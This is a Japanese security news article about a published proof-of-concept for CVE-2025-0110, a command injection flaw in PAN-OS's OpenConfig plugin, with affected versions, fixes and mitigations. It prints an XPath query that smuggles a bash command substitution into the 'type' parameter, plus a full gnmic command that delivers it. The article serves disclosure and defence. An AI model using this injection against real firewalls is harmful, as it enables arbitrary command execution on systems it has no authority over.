Palo Alto NetworksのPAN-OSの脆弱性(CVE-2025-0110)のPoCが公開

セキュリティニュース

投稿日時: 更新日時:

Palo Alto NetworksのPAN-OSの脆弱性が認証バイパスに悪用される(CVE-2025-0108)

2025年2月20日、Googleのセキュリティ研究者が、Palo Alto Networks(パロアルトネットワークス)のファイアウォールOS「PAN-OS」におけるコマンド インジェクションの脆弱性「CVE-2025-0110」についてのPoCエクスプロイトが公開されました。

この脆弱性はCVSS v4スコア8.6(High) に評価されており、認証済みの攻撃者が管理者権限で任意のコマンドを実行 できる可能性がありますので、対象者はアップデートする事をお勧めします

影響を受けるバージョン

この脆弱性は、OpenConfigプラグインが「有効 になっている」かつPAN-OSの特定バージョン に影響を及ぼします。

  • PAN-OS 11.0.4以降(OpenConfig 2.0.1+)
  • PAN-OS 10.2.11以降(OpenConfig 2.0.2+)

脆弱性の修正バージョン

PAN-OS 11.2.5 以降に修正バージョンのOpenConfig Plugin 2.1.2 が含まれています。

なお、OpenConfigが不要な場合、プラグインを無効化または削除する事をお勧めします。

脆弱性のCVE-2025-0110概要

脆弱性は、PAN-OSのOpenConfigプラグイン に存在します。

OpenConfigは、gnmi.Subscribe機能を使用してシステムログを取得するAPIを提供しますが、このAPIのtypeパラメータの不適切な処理 により、サイバー攻撃者がbashコマンドを注入 できる状態になっています。

攻撃者は、OpenConfig APIリクエストのXPATHクエリ構造を悪用して、任意のコマンドを実行 できます。以下のような特別に細工されたリクエストを使用することで、ファイアウォールのOS上で任意のコマンドを実行できます。

/pan/logging/query/custom[direction=fwd][max_logs=2][period=last-24-hrs][type=$(echo system > file1; cat file1)]

さらに、gnmicツール を使用することで、攻撃者は簡単にbashコマンドをPAN-OSデバイス上で実行できます。

./gnmic -a <IP>:<PORT> -u <username> --password=<password> --skip-verify \
-e json_ietf subscribe --mode once --log \
--path 'pan-logging:/pan/logging/query/custom[type=$(echo system > file1; cat file1)][direction=fwd][max_logs=2][period=last-24-hrs]'

この攻撃の結果、システムが脆弱であることが確認され、任意のコマンドが実行可能になります。

推奨される対策

  • OpenConfigプラグインをアップデート
  • OpenConfigプラグインを無効化またはアンインストール
  • 管理インターフェースのアクセス制限(ポート9339へのアクセスを信頼できるネットワークのみに制限)